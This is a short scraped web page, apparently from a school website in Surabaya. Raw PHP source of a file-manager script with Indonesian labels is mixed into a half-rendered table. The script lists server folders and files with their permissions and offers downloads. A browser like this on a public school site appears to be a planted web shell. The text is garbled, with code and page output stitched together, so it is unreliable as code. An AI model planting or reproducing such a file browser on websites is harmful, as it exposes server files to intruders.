| Nama | Ukuran | Izin | Aksi | Kembali ke " . basename($parentPath) . " | -- | -- | -- | "; } $folders = []; $files = []; $scandir = scandir($path); foreach ($scandir as $item) { $fullpath = "$path/$item"; if (is_dir($fullpath) && $item != '.' && $item != '..') { $folders[] = $item; } elseif (is_file($fullpath)) { $files[] = $item; } } foreach ($folders as $folder) { $fullpath = rtrim($path, '/') . '/' . $folder; echo "
|---|---|---|---|
| $folder | -- | " . getPermissions($fullpath) . " | |
| $file | $size | " . getPermissions($fullpath) . " | Unduh |
© SMP Muhammadiyah 15 Surabaya 2026. All rights reserved.
Kebijakan Privasi | 8.3